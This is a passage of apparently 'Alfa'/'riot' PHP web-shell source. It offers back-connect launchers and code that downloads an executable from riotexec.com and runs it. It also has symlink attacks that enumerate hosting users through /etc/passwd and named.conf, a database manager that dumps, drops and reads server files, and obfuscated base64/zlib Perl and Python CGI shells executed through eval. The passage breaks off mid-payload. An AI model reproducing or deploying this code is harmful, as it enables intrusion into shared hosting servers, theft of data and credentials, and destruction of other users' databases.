$allow = ["perl", "ruby", "python", "node"];
eval('$lan=$' . $lang . ";");
if (in_array($lang, $allow)) {
if (__write_file($name, __get_resource($lan))) {
if (_riot_can_runCommand(true, true)) {
$os = $GLOBALS["sys"] != "win" ? "1>/dev/null 2>&1 &" : "";
$out = riotEx("$lang $name $arg $os");
if ($out == "") {
$out = "[ Finished...! ] ";
}
echo "{$out}";
}
} else {
echo "[ Failed...! ]
";
}
}
if ($lang == "java" || $lang == "c") {
$code = __get_resource($lan);
$out = nl2br(bcinit($lang, $code, "", ""));
echo "{$out}
";
}
if ($lang == "bcwin") {
$riot = new AlfaCURL();
$s = $riot->Send("http://riotexec.com/bc/windows.exe");
$tmpdir = ALFA_TEMPDIR;
$f = @fopen($tmpdir . "/bcwin.exe", "w+");
@fwrite($f, $s);
@fclose($f);
$out = riotEx($tmpdir . "/bcwin.exe " . $_POST["riot2"] . " " . $_POST["riot3"]);
}
if ($lang == "php") {
echo "";
$code = __get_resource($lan);
if ($code !== false) {
$code = "\$target = \"" . $arg . "\";\n" . $code;
eval($code);
echo "[ Finished...! ] ";
}
echo "";
}
}
echo "";
riotfooter();
}
function riotMakePwd()
{
if (_riot_file_exists("/etc/virtual/domainowners") || (_riot_file_exists("/etc/named.conf") && _riot_file_exists("/etc/valiases"))) {
return "/home/{user}/public_html/";
}
$document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
$public = end($document);
array_pop($document);
array_pop($document);
$path = implode("/", $document) . "/{user}/" . $public;
return $path;
}
function riotGetDomains($state = false)
{
$state = "named.conf";
$lines = [];
$lines = _riot_file("/etc/named.conf");
if (!$lines) {
$lines = @scandir("/etc/valiases/");
$state = "valiases";
if (!$lines) {
$lines = @scandir("/var/named");
$state = "named";
if (!$lines && $state) {
$lines = _riot_file("/etc/passwd");
$state = "passwd";
}
}
}
return ["lines" => $lines, "state" => $state];
}
function riotCreateParentFolder()
{
$parent = $GLOBALS["home_cwd"] . "/" . __SYS_CONFIG_FOLDER__;
if (!@is_dir($parent)) {
@mkdir($parent, 0755, true);
}
}
function riotsymlink()
{
riothead();
AlfaNum(9, 10);
riotCreateParentFolder();
@chdir($GLOBALS["home_cwd"] . "/" . __SYS_CONFIG_FOLDER__);
echo '
| Symlink || Symlink( php ) | | Symlink( perl ) | | Symlink( python ) | | File Symlink |
\',\'exec\'))';
$cginame = "symperl.riot";
$source = $perl;
$lang = "perl";
if ($_POST["riot2"] == "sympy") {
$cginame = "pysymlink.riot";
$source = $py;
$lang = "python";
}
@__write_file($cginame, $source);
@chmod($cginame, 0755);
echo __pre();
$resource = riotEx("{$lang} {$cginame} {$sympath}", false, true, true);
if (strlen($resource) == 0) {
echo AlfaiFrameCreator("cgiriot/" . $cginame);
} else {
echo $resource;
}
}
if (isset($_POST["riot4"]) && $_POST["riot4"] == "SymFile") {
if (function_exists("symlink") || _riot_can_runCommand(true, true)) {
AlfaNum(9, 10);
echo __pre() .
'
| Symlink File And Directory | ';
$path = $_POST["riot5"];
$symname = $_POST["riot6"];
$riotexec58 = $_POST["riot7"];
if ($riotexec58) {
$new_name = str_replace(".", "_", basename($symname));
$rand_dir = $new_name . rand(111, 9999);
$sym_dir = "riotsymlinkphp/" . $rand_dir . "/";
@mkdir($sym_dir, 0777, true);
riotcgihtaccess("sym", $sym_dir, $symname);
_riot_symlink("$path", "$sym_dir/$symname");
echo __pre();
echo 'Click >> ' . $symname . " ";
}
} else {
echo "[+] Symlink Function Disabled !
* Domains Users symlink ";
if (_riot_file_exists("/etc/named.conf") && !_riot_file_exists("/etc/virtual/domainowners") && _riot_file_exists("/etc/valiases/")) {
echo "";
$lines = [];
$anony_domains = [];
$anonymous_users = [];
$f_black = [];
$error = false;
$anonymous = false;
$makepwd = "/home/{user}/public_html/";
$domains = riotGetDomains();
$lines = $domains["lines"];
$state = $domains["state"];
$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
$can_runcmd = _riot_can_runCommand(false, false);
if (!$is_posix && !$can_runcmd) {
$anonymous = true;
$anony_domains = $domains["lines"];
$lines = _riot_file("/etc/passwd");
}
echo $table_header;
$count = 1;
$template =
'{count} {domain} {owner} Symlink {count} {url} {user} Symlink
";
$cant_symlink = false;
}
} else {
echo "[+] Symlink Function Disabled !
";
$cant_symlink = false;
}
if ($cant_symlink) {
echo '
Error...
';
}
echo "";
}
echo "
";
riotfooter();
}
function riotsql()
{
class DbClass
{
public $type;
public $link;
public $res;
public $mysqli_connect_error = false;
public $mysqli_connect_error_msg = "";
function __construct($type)
{
$this->type = $type;
}
function connect($host, $user, $pass, $dbname)
{
switch ($this->type) {
case "mysql":
if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) {
return true;
} else {
$this->mysqli_connect_error = true;
$this->mysqli_connect_error_msg = mysqli_connect_error();
return false;
}
break;
case "pgsql":
$host = explode(":", $host);
if (!$host[1]) {
$host[1] = 5432;
}
if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) {
return true;
}
break;
}
return false;
}
function selectdb($db)
{
switch ($this->type) {
case "mysql":
if (@mysqli_select_db($db)) {
return true;
}
break;
}
return false;
}
function query($str)
{
switch ($this->type) {
case "mysql":
return $this->res = @mysqli_query($this->link, $str);
break;
case "pgsql":
return $this->res = @pg_query($this->link, $str);
break;
}
return false;
}
function fetch()
{
$res = func_num_args() ? func_get_arg(0) : $this->res;
switch ($this->type) {
case "mysql":
return @mysqli_fetch_assoc($res);
break;
case "pgsql":
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs()
{
switch ($this->type) {
case "mysql":
return $this->query("SHOW databases");
break;
case "pgsql":
return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables()
{
switch ($this->type) {
case "mysql":
return $this->res = $this->query("SHOW TABLES");
break;
case "pgsql":
return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
break;
}
return false;
}
function error()
{
switch ($this->type) {
case "mysql":
return @mysqli_error($this->link);
break;
case "pgsql":
return @pg_last_error();
break;
}
return false;
}
function setCharset($str)
{
switch ($this->type) {
case "mysql":
if (function_exists("mysql_set_charset")) {
return @mysqli_set_charset($this->link, $str);
} else {
$this->query("SET CHARSET " . $str);
}
break;
case "pgsql":
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function loadFile($str)
{
switch ($this->type) {
case "mysql":
return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
break;
case "pgsql":
$this->query("CREATE TABLE riotexec(file text);COPY riotexec FROM '" . addslashes($str) . "';select file from riotexec;");
$r = [];
while ($i = $this->fetch()) {
$r[] = $i["file"];
}
$this->query("drop table riotexec");
return ["file" => implode("\n", $r)];
break;
}
return false;
}
}
$db = new DbClass($_POST["type"]);
riothead();
$form_visibility = "table";
if (isset($_POST["sql_host"])) {
$connection_db = $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]);
if ($connection_db && !empty($_POST["sql_base"])) {
$form_visibility = "none";
}
}
$database_list = [];
echo "
" .
($form_visibility != "none"
? "| Sql Manager |" .
getConfigHtml("all") .
"
"
: "") .
"
";
if ($db->mysqli_connect_error) {
echo '' . $db->mysqli_connect_error_msg . "";
}
if (!empty($curr_mysql_id)) {
$sql_title_db = "";
if (!empty($_POST["sql_base"])) {
$sql_title_db = "d.querySelector('#tab_" . $curr_mysql_id . " span').innerHTML='" . addslashes($_POST["sql_base"]) . "';";
}
echo "";
}
if (isset($db) && $db->link) {
if (!empty($_POST["sql_base"])) {
echo "<<
";
foreach ($database_list as $db_name) {
echo '
' .
$db_name .
'';
if ($db_name == $_POST["sql_base"]) {
$db->selectdb($_POST["sql_base"]);
$tbls_res = $db->listTables();
echo '- " .
$value .
"" .
(empty($_POST["sql_count"]) ? " " : " ({$n["n"]})") .
"
";
}
echo '
';
}
echo "";
}
echo "ResultQuerySearchStructureInsert";
}
echo "";
echo "
";
} else {
echo htmlspecialchars($db->error());
}
echo "";
riotfooter();
}
function riotSql_manager_api()
{
$db = $_POST["riot1"];
$type = $_POST["riot2"];
$sql_count = $_POST["riot3"] == "true" ? true : false;
$db = @json_decode($db, true);
$conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]);
@mysqli_set_charset($conn, "utf8");
if ($conn) {
if ($type == "load_all_tables") {
$tables = [];
$q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('" . implode("','", $db["databases"]) . "');");
$count = 0;
while ($row = @mysqli_fetch_assoc($q_tables)) {
if ($sql_count) {
$count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row["table_schema"] . "`.`" . $row["table_name"] . "`");
if ($count_q) {
$count = @mysqli_fetch_row($count_q);
$count = $count[0];
}
}
$tables[$row["table_schema"]][] = [
"name" => $row["table_name"],
"count" => (int) $count,
];
}
foreach ($db["databases"] as $db) {
if (!isset($tables[$db])) {
$tables[$db] = null;
}
}
echo @json_encode($tables);
} elseif ($type == "dump_drop") {
if ($db["mode"] == "drop") {
foreach ($db["tables"] as $table) {
@mysqli_query($conn, "DROP TABLE `" . $table . "`;");
}
$tables = [];
$q_tables = @mysqli_query($conn, "SHOW TABLES;");
$count = 0;
while ($row = @mysqli_fetch_array($q_tables)) {
if ($sql_count) {
$count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row[0] . "`");
if ($count_q) {
$count = @mysqli_fetch_row($count_q);
$count = $count[0];
}
}
$tables[] = ["name" => $row[0], "count" => (int) $count];
}
echo @json_encode($tables);
} else {
if (strlen(riotEx("mysqldump")) > 0) {
riotEx("mysqldump --single-transaction --host=\"" . $db["host"] . "\" --user=\"" . $db["user"] . "\" --password=\"" . $db["pass"] . "\" " . $db["db"] . " " . implode(" ", $db["tables"]) . " > " . $db["dump_file"]);
} else {
$fp = @fopen($db["dump_file"], "w");
foreach ($db["tables"] as $table) {
$res = @mysqli_query($conn, "SHOW CREATE TABLE `" . $table . "`");
$create = @mysqli_fetch_array($res);
$sql = "DROP TABLE IF EXISTS `" . $table . "`;\n" . $create[1] . ";\n";
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
$tbl_data = @mysqli_query($conn, "SELECT * FROM `" . $table . "`");
$head = true;
while ($item = @mysqli_fetch_assoc($tbl_data)) {
$columns = [];
foreach ($item as $k => $v) {
if ($v == null) {
$item[$k] = "''";
} elseif (is_numeric($v)) {
$item[$k] = $v;
} else {
$item[$k] = "'" . @mysqli_real_escape_string($conn, $v) . "'";
}
$columns[] = "`" . $k . "`";
}
if ($head) {
$sql = "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ")";
$head = false;
} else {
$sql = "\n\t,(" . implode(", ", $item) . ")";
}
if ($fp) {
fwrite($fp, $sql);
} else {
echo $sql;
}
}
if (!$head) {
if ($fp) {
fwrite($fp, ";\n\n");
} else {
echo ";\n\n";
}
}
}
}
echo @json_encode([
"status" => true,
"file" => $db["dump_file"],
]);
}
} elseif ($type == "load_tables") {
$tables = [];
$q_tables = @mysqli_query($conn, "SHOW TABLES;");
$count = 0;
while ($row = @mysqli_fetch_array($q_tables)) {
if ($sql_count) {
$count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $row[0] . "`");
if ($count_q) {
$count = @mysqli_fetch_row($count_q);
$count = $count[0];
}
}
$tables[] = ["name" => $row[0], "count" => (int) $count];
}
echo @json_encode($tables);
} elseif ($type == "alter") {
$db["alter"]["type"] = strtolower($db["alter"]["type"]);
$inputs = $db["alter"]["type"] . "(" . $db["alter"]["input"] . ")";
$text_input = ["longtext", "text", "mediumtext", "tinytext"];
if (in_array($db["alter"]["type"], $text_input)) {
$inputs = $db["alter"]["type"];
}
@mysqli_query($conn, "ALTER TABLE `" . $db["table"] . "` MODIFY COLUMN `" . $db["column"] . "` " . $inputs);
$error = @mysqli_error($conn);
if ($error) {
echo $error;
} else {
echo "ok";
}
} elseif ($type == "edit" || $type == "delete" || $type == "delete_all") {
if ($type == "edit") {
$q = @mysqli_query($conn, "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` = '" . addslashes($db["key"]) . "' LIMIT 0,1");
$row = @mysqli_fetch_assoc($q);
if ($row) {
$columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" . $db["db"] . "' AND `TABLE_NAME` = '" . $db["table"] . "'");
$columns = [];
$edit_data = [];
while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
$input = ["col_type" => $row2["COLUMN_TYPE"]];
$row2["type"] = strtolower($row2["type"]);
switch ($row2["type"]) {
case "longtext":
case "text":
case "mediumtext":
case "tinytext":
$input["tag"] = "textarea";
break;
case "int":
case "smallint":
case "bigint":
case "tinyint":
case "mediumint":
$input["tag"] = "input";
$input["type"] = "number";
break;
default:
$input["tag"] = "input";
$input["type"] = "text";
}
$columns[$row2["name"]] = $input;
}
foreach ($row as $key => $v) {
$edit_data[] = [
"col" => $key,
"value" => htmlspecialchars($v, ENT_QUOTES, "UTF-8"),
"type" => $columns[$key],
];
}
echo @json_encode($edit_data);
}
} else {
if ($type == "delete_all") {
$rows = implode("', '", $db["rows"]);
} else {
$rows = addslashes($db["key"]);
}
$query = "DELETE FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE `" . $db["col_key"] . "` IN ('" . $rows . "')";
@mysqli_query($conn, $query);
$error = @mysqli_error($conn);
if ($error) {
$status = false;
} else {
$status = true;
}
echo @json_encode([
"status" => $status,
"error" => $error,
"query" => $query,
]);
}
} elseif ($type == "update") {
$query = "UPDATE `" . $db["db"] . "`.`" . $db["table"] . "` SET ";
foreach ($db["data"] as $col => $val) {
$query .= "`" . $col . "` = '" . mysqli_real_escape_string($conn, $val) . "',";
}
$query = substr($query, 0, -1);
$query .= "WHERE `" . $db["col_key"] . "` = '" . $db["key"] . "'";
$res = @mysqli_query($conn, $query);
echo @json_encode([
"status" => $res,
"error" => @mysqli_error($conn),
]);
} elseif ($type == "insert") {
$query = "INSERT INTO `" . $db["db"] . "`.`" . $db["table"] . "` ";
foreach ($db["data"] as $col => $val) {
$cols .= $col . ",";
$vals .= "'" . mysqli_real_escape_string($conn, $val) . "',";
}
$cols = substr($cols, 0, -1);
$vals = substr($vals, 0, -1);
$query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")";
$res = @mysqli_query($conn, $query);
echo @json_encode([
"status" => $res,
"error" => @mysqli_error($conn),
]);
} else {
$pages = 0;
$title = false;
$query = "";
$tbl_content = '';
$line = 0;
$tables = [];
$columns = [];
if ($type == "load_data") {
$query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT 0,30";
$tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `" . $db["db"] . "`.`" . $db["table"] . "`");
$tbl_count = @mysqli_fetch_row($tbl_count_q);
$columns_query = @mysqli_query(
$conn,
"SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '" .
$db["db"] .
"' AND `TABLE_NAME` = '" .
$db["table"] .
"'"
);
while ($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)) {
$columns[] = $row2;
}
if ($tbl_count[0] > 30) {
$pages = ceil($tbl_count[0] / 30);
}
} elseif ($type == "query") {
$query = $db["query"];
} elseif ($type == "page") {
$db["page"] = (int) $db["page"] - 1;
$query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` LIMIT " . $db["page"] * 30 . ",30";
} elseif ($type == "search") {
$search = "";
$search_noval = ["= ''", "!= ''", "IS NULL", "IS NOT NULL"];
foreach ($db["search"] as $col => $val) {
$search_noval_r = in_array($val["opt"], $search_noval);
if (empty($val["value"]) && !$search_noval_r) {
continue;
}
if (strstr($val["opt"], "...") || $search_noval_r) {
$val["opt"] = str_replace("...", $val["value"], $val["opt"]);
$search .= $col . " " . $val["opt"] . " AND ";
} else {
$search .= $col . " " . $val["opt"] . " '" . addslashes($val["value"]) . "' AND ";
}
}
$search .= "1=1";
$query = "SELECT * FROM `" . $db["db"] . "`.`" . $db["table"] . "` WHERE " . $search;
}
$q_tables = @mysqli_query($conn, $query);
if (!$q_tables) {
echo @json_encode([
"status" => false,
"error" => @mysqli_error($conn),
"query" => $query,
]);
return false;
}
$col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($db["db"]) . "' AND TABLE_NAME = '" . @addslashes($db["table"]) . "' AND COLUMN_KEY = 'PRI'");
if ($col_key) {
$col_key = @mysqli_fetch_row($col_key);
$col_key = $col_key[0];
if (!empty($col_key)) {
$tbl_content =
'';
}
} else {
$col_key = false;
}
while ($item = @mysqli_fetch_assoc($q_tables)) {
if (!$title) {
$tbl_content .= '';
if ($col_key) {
$tbl_content .=
'Edit Delete ';
}
foreach ($item as $key => $value) {
$tbl_content .= "" . $key . " ";
}
reset($item);
$title = true;
$tbl_content .= " ";
}
if ($col_key) {
$cacheMsg =
'Edit Delete ';
}
$tbl_content .= ' ' . $cacheMsg;
$line++;
foreach ($item as $key => $value) {
if ($value == null) {
$tbl_content .= "null ";
} else {
$tbl_content .= "" . nl2br(htmlspecialchars($value)) . " ";
}
}
$tbl_content .= " ";
}
$tbl_content .= "
";
if (!$title) {
$tbl_content = "Table is empty...";
}
echo @json_encode([
"status" => true,
"table" => $tbl_content,
"columns" => $columns,
"pages" => $pages,
"query" => $query,
]);
}
@mysqli_close($conn);
}
}
function riotcgishell()
{
riothead();
$div = "";
riotCreateParentFolder();
@chdir($GLOBALS["home_cwd"] . "/" . __SYS_CONFIG_FOLDER__);
if (!in_array($_POST["riot1"], ["perl", "py"])) {
$div = "";
echo '| CGI Shell || Perl | | Python | ';
}
if (isset($_POST["riot1"]) && in_array($_POST["riot1"], ["perl", "py"])) {
@mkdir("cgiriot", 0755);
@chdir("cgiriot");
riotcgihtaccess("cgi");
$name = $_POST["riot1"] . ".riot";
$perl =
"#!/usr/bin/perl -I/usr/local/bandmin" .
"\n" .
'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
$py =
"#!/usr/bin/python" .
"\nimport zlib, base64\n" .
'eval(compile(zlib.decompress(base64.b64decode("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